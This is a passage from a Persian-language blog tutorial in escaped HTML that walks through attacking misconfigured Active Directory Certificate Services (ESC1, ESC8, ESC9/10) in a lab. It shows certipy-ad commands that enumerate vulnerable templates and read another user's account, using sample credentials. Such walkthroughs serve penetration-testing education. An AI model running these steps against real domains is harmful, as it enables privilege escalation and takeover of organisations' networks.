\u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647<\/strong>: \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0627\u0644\u06af\u0648\u0647\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632 \u067e\u0627\u06cc\u06cc\u0646 \u0627\u062c\u0627\u0632\u0647 \u062f\u0647\u062f \u062a\u0627 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0628\u0631\u0627\u06cc \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632 \u0628\u0627\u0644\u0627 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06a9\u0646\u0646\u062f (ESC1).<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u062b\u0628\u062a\u200c\u0646\u0627\u0645 \u0648\u0628<\/strong>: \u0627\u0641\u0634\u0627\u06cc \u0631\u0627\u0628\u0637 AD CS (\/certsrv) \u0627\u0632 \u0637\u0631\u06cc\u0642 HTTP \u0628\u0627 NTLM \u0641\u0639\u0627\u0644 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0627\u062a NTLM relay \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0648\u062f (ESC8).<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646<\/strong>: \u0645\u062f\u06cc\u0631\u06cc\u062a \u0646\u0627\u062f\u0631\u0633\u062a keyCredentialLink \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u062f \u06a9\u0647 \u062d\u062a\u06cc \u0628\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0646\u06cc\u0632 \u0627\u062f\u0627\u0645\u0647 \u0645\u06cc\u200c\u06cc\u0627\u0628\u062f (ESC9\/10).<\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632<\/strong><strong> (ESC)<\/strong>: \u062d\u0645\u0644\u0647\u200c\u06a9\u0646\u0646\u062f\u06af\u0627\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0645\u0627\u0646\u0646\u062f SAN\u200c\u0647\u0627\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0634\u062f\u0647 \u0646\u0627\u062f\u0631\u0633\u062a (ESC1)\u060c NTLM relay (ESC8) \u0648 \u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646 (ESC9\/10) \u0628\u0631\u0627\u06cc \u062a\u0635\u0627\u062d\u0628 \u062f\u0627\u0645\u0646\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\"><strong>\u0645\u0642\u062f\u0645\u0627\u062a<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">Windows Server 2019 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 Active Directory \u06a9\u0647 \u0627\u0632 PKINIT \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u062f\u0627\u0645\u0646\u0647 \u0628\u0627\u06cc\u062f \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory \u0648 Certificate Authority \u0631\u0627 \u0628\u0627 \u0646\u0642\u0634 Web Enrollment \u0641\u0639\u0627\u0644 \u06a9\u0631\u062f\u0647 \u0628\u0627\u0634\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\">Kali Linux \u0628\u0627 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u0627\u0632 \u0627\u0628\u0632\u0627\u0631\u0647\u0627.<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0627\u0628\u0632\u0627\u0631\u0647\u0627: certipy-ad, PetitPotam<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u0645\u0627 \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a ADCS \u0628\u0647 \u0635\u0641\u0631 \u0631\u0648\u0632 \u0646\u06cc\u0627\u0632\u06cc \u0646\u062f\u0627\u0631\u06cc\u0645. \u06cc\u06a9 \u0627\u0644\u06af\u0648\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0646\u0627\u062f\u0631\u0633\u062a \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 \u062a\u0635\u0627\u062d\u0628 \u06a9\u0627\u0645\u0644 \u062f\u0627\u0645\u0646\u0647 \u0634\u0648\u062f\u060c \u0647\u0645\u0627\u0646\u0646\u062f \u06cc\u06a9 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631\u060c \u0627\u0645\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc \u0628\u0648\u0645\u06cc \u0648 \u067e\u0631\u0648\u062a\u06a9\u0644\u200c\u0647\u0627\u06cc \u0642\u0627\u0646\u0648\u0646\u06cc.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f Certipy \u0627\u06cc\u0646 \u0627\u0641\u0632\u0627\u06cc\u0634\u200c\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646 \u0627\u0645\u062a\u06cc\u0627\u0632 \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u0627\u0639\u062a\u0645\u0627\u062f \u0631\u0627 \u062f\u0631 \u062f\u0627\u062e\u0644 ADCS \u06a9\u0634\u0641 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062d\u0627\u0644\u0627 \u06a9\u0647 \u062f\u0631\u06a9 \u062e\u0648\u0628\u06cc \u0627\u0632 \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (ADCS) \u0648 \u0645\u0633\u06cc\u0631\u0647\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc ESC \u062f\u0627\u0631\u06cc\u0645\u060c \u0645\u0634\u062e\u0635 \u0627\u0633\u062a \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0646\u0627\u062f\u0631\u0633\u062a \u0627\u0639\u062a\u0645\u0627\u062f \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f ADCS \u0647\u062f\u0641\u06cc \u0628\u0631\u062c\u0633\u062a\u0647 \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0647\u200c\u06a9\u0646\u0646\u062f\u06af\u0627\u0646 \u0628\u0627\u0634\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0627 \u062f\u0631 \u0646\u0638\u0631 \u06af\u0631\u0641\u062a\u0646 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u060c \u0628\u06cc\u0627\u06cc\u06cc\u062f \u0628\u0647 \u0637\u0648\u0631 \u0639\u0645\u0644\u06cc \u0627\u0632 \u0622\u0646\u200c\u0647\u0627 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 certipy-ad.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u06cc\u0627\u06cc\u06cc\u062f \u0628\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0646\u0642\u0627\u0637 \u0636\u0639\u0641 \u0634\u0631\u0648\u0639 \u06a9\u0646\u06cc\u0645. \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0628\u0647 \u0647\u0631 \u06a9\u0627\u0631\u0628\u0631 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a\u200c\u0634\u062f\u0647 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u0646\u062f \u06a9\u0647 \u0628\u0647\u200c\u0637\u0648\u0631 \u062e\u0648\u062f\u06a9\u0627\u0631 \u0628\u0631\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0634\u062a\u0631\u06cc \u062b\u0628\u062a\u200c\u0646\u0627\u0645 \u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">certipy-ad find -u raj -p Password@1 -dc-ip 192.168.1.20 -target-ip 192.168.1.20 -vulnerable -enable -stdout<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 CA \u0631\u0627 \u0627\u0633\u06a9\u0646 \u0645\u06cc\u200c\u06a9\u0646\u062f \u062a\u0627 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0627\u06cc \u06a9\u0647 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a\u06cc \u062f\u0627\u0631\u0646\u062f \u0648 \u0627\u0645\u06a9\u0627\u0646 \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632 (privilege escalation) \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f\u060c \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u06a9\u0646\u062f. \u0627\u06cc\u0646 \u0634\u0628\u06cc\u0647 \u0628\u0647 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0646\u0648\u0639 ESC1 \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u062f\u0633\u062a\u0648\u0631 certipy-ad find \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f ESC1 \u0645\u0646\u062c\u0631 \u0634\u0648\u062f. \u0627\u06cc\u0646 \u0627\u0644\u06af\u0648\u0647\u0627 \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646\u06cc \u06a9\u0647 \u0628\u0647 \u0637\u0648\u0631 \u0635\u062d\u06cc\u062d \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u0627\u0645\u06a9\u0627\u0646 \u062b\u0628\u062a\u200c\u0646\u0627\u0645 \u062e\u0648\u062f\u06a9\u0627\u0631 \u0628\u0631\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062e\u0627\u0635 \u0645\u0627\u0646\u0646\u062f \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0634\u062a\u0631\u06cc \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone wp-image-19880\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/1-3-300x96.png\" alt=\"\" width=\"491\" height=\"157\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/1-3-300x96.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/1-3-1024x329.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/1-3-768x247.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/1-3-150x48.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/1-3.png 1430w\" sizes=\"(max-width: 491px) 100vw, 491px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f Client Authentication EKU\u060c &#8220;Supply in Request&#8221; SAN\u060c \u0635\u062f\u0648\u0631 \u062e\u0648\u062f\u06a9\u0627\u0631 \u0628\u062f\u0648\u0646 \u062a\u0627\u06cc\u06cc\u062f \u0648 \u062f\u0633\u062a\u0631\u0633\u200c\u067e\u0630\u06cc\u0631\u06cc \u062a\u0648\u0633\u0637 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u067e\u0627\u06cc\u06cc\u0646 (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c &#8220;sanjeet \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0648\u0631\u062f) \u062f\u0627\u0631\u0646\u062f. \u062d\u0627\u0644\u0627 \u0628\u06cc\u0627\u06cc\u06cc\u062f \u0628\u0628\u06cc\u0646\u06cc\u0645 \u06a9\u0647 \u0686\u0647 \u0645\u0648\u0627\u0631\u062f\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u06a9\u0631\u062f\u0647\u200c\u0627\u06cc\u0645.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c CA \u0648 \u0627\u0644\u06af\u0648\u0647\u0627 \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0631\u062f\u0647 \u0648 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0627\u0632 \u062d\u0645\u0644\u0627\u062a ESC \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c ESC6\u060c ESC8) \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0628\u0647 \u0637\u0648\u0631 \u0645\u0639\u0645\u0648\u0644 \u0634\u0627\u0645\u0644 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc\u06cc \u0647\u0633\u062a\u0646\u062f \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0628\u0627\u0639\u062b \u062d\u0645\u0644\u0627\u062a \u0645\u062e\u062a\u0644\u0641 \u0634\u0648\u0646\u062f\u060c \u0645\u0627\u0646\u0646\u062f \u062a\u0646\u0638\u06cc\u0645\u0627\u062a EKU (Extended Key Usage) \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0634\u062a\u0631\u06cc\u060c \u0648\u062c\u0648\u062f \u06af\u0632\u06cc\u0646\u0647 &#8220;Supply in Request&#8221; SAN (Subject Alternative Name) \u06a9\u0647 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u062e\u0627\u0635\u06cc \u0631\u0627 \u062f\u0631 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc \u0648\u0627\u0631\u062f \u06a9\u0646\u062f\u060c \u0648 \u0647\u0645\u0686\u0646\u06cc\u0646 \u0635\u062f\u0648\u0631 \u062e\u0648\u062f\u06a9\u0627\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627 \u0628\u062f\u0648\u0646 \u062a\u0627\u06cc\u06cc\u062f \u06a9\u0647 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u0647 \u06cc\u06a9 \u06a9\u0627\u0631\u0628\u0631 \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u067e\u0627\u06cc\u06cc\u0646\u060c \u0645\u0627\u0646\u0646\u062f &#8220;sanjeet&#8221;\u060c \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0628\u062f\u0647\u062f \u06a9\u0647 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0627\u06cc \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0645\u0646\u0627\u0628\u0639 \u062d\u0633\u0627\u0633 \u062f\u0631\u06cc\u0627\u0641\u062a \u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img decoding=\"async\" class=\"alignnone wp-image-19881\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/2-6-300x246.png\" alt=\"\" width=\"491\" height=\"403\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/2-6-300x246.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/2-6-1024x840.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/2-6-768x630.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/2-6-150x123.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/2-6.png 1080w\" sizes=\"(max-width: 491px) 100vw, 491px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062a\u0648\u062c\u0647<\/strong><strong>:<\/strong> \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647 \u067e\u0627\u06cc\u0647\u200c\u06af\u0630\u0627\u0631\u06cc \u0628\u0631\u0627\u06cc \u06a9\u0644 \u0632\u0646\u062c\u06cc\u0631\u0647 \u062d\u0645\u0644\u0647 \u0645\u0627 \u0627\u0633\u062a. \u0628\u062f\u0648\u0646 \u06cc\u06a9 \u0627\u0644\u06af\u0648\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u060c \u0627\u06a9\u062b\u0631 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc\u200c\u0647\u0627\u06cc \u0628\u0639\u062f\u06cc \u0645\u0645\u06a9\u0646 \u0646\u062e\u0648\u0627\u0647\u0646\u062f \u0628\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0628\u0631\u0631\u0633\u06cc \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u062d\u0633\u0627\u0628<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062d\u0627\u0644\u0627 \u0628\u06cc\u0627\u06cc\u06cc\u062f \u0627\u0631\u0632\u06cc\u0627\u0628\u06cc \u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0686\u0647 \u0686\u06cc\u0632\u06cc \u0631\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0646\u06cc\u0645. \u0627\u06af\u0631 \u06a9\u0627\u0631\u0628\u0631 \u0645\u0627 (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c raj) \u0642\u0627\u062f\u0631 \u0628\u0647 \u062e\u0648\u0627\u0646\u062f\u0646 \u06cc\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc \u062f\u06cc\u06af\u0631\u06cc (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c sanjeet) \u0628\u0627\u0634\u062f\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0642\u0627\u062f\u0631 \u0628\u0647 \u0627\u0646\u062c\u0627\u0645 \u0645\u0648\u0627\u0631\u062f \u0632\u06cc\u0631 \u0628\u0627\u0634\u06cc\u0645:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u062a\u0632\u0631\u06cc\u0642 \u06cc\u06a9 \u0627\u0639\u062a\u0628\u0627\u0631 \u067e\u0646\u0647\u0627\u0646 (shadow credential) \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0628\u0639\u062f\u06cc<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0628\u0627\u0632\u0646\u0634\u0627\u0646\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0628\u0631\u0627\u06cc \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0627\u0641\u0632\u0648\u062f\u0646 \u062e\u0648\u062f \u0628\u0647 \u06af\u0631\u0648\u0647\u200c\u0647\u0627\u06cc \u067e\u0631\u0627\u0645\u062a\u06cc\u0627\u0632 \u0628\u0631\u0627\u06cc \u06a9\u0646\u062a\u0631\u0644 \u0628\u06cc\u0634\u062a\u0631<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u0627\u06cc\u0646 \u06a9\u0627\u0631\u060c \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad account -u raj -p Password@1 -dc-ip 192.168.1.20 -target 192.168.1.20 -user sanjeet read<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u0633\u0648\u0626\u06cc\u0686 read \u062f\u0631 Certipy \u0628\u0647 raj \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0628 sanjeet \u0631\u0627 \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u0648 \u0645\u0634\u0627\u0647\u062f\u0647 \u06a9\u0646\u062f\u060c \u0645\u0627\u0646\u0646\u062f cn\u060c sAMAccount \u0648 \u0633\u0627\u06cc\u0631 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0628\u0631\u0627\u06cc \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632 \u06cc\u0627 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0628\u06cc\u0634\u062a\u0631 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u06af\u06cc\u0631\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634 \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u0627\u06af\u0631 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0628\u062a\u0648\u0627\u0646\u062f \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631 \u062f\u06cc\u06af\u0631\u06cc \u0631\u0627 \u0645\u0634\u0627\u0647\u062f\u0647 \u06cc\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0647\u062f\u060c \u0627\u06cc\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0627\u062a \u0628\u06cc\u0634\u062a\u0631\u06cc \u0645\u0627\u0646\u0646\u062f \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632 \u062f\u0633\u062a\u0631\u0633\u06cc \u06cc\u0627 \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u062d\u0633\u0627\u0628\u200c\u0647\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img decoding=\"async\" class=\"alignnone wp-image-19882\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/3-2-300x76.png\" alt=\"\" width=\"501\" height=\"127\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/3-2-300x76.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/3-2-1024x260.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/3-2-768x195.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/3-2-150x38.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/3-2.png 1325w\" sizes=\"(max-width: 501px) 100vw, 501px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062f\u0633\u062a\u06a9\u0627\u0631\u06cc 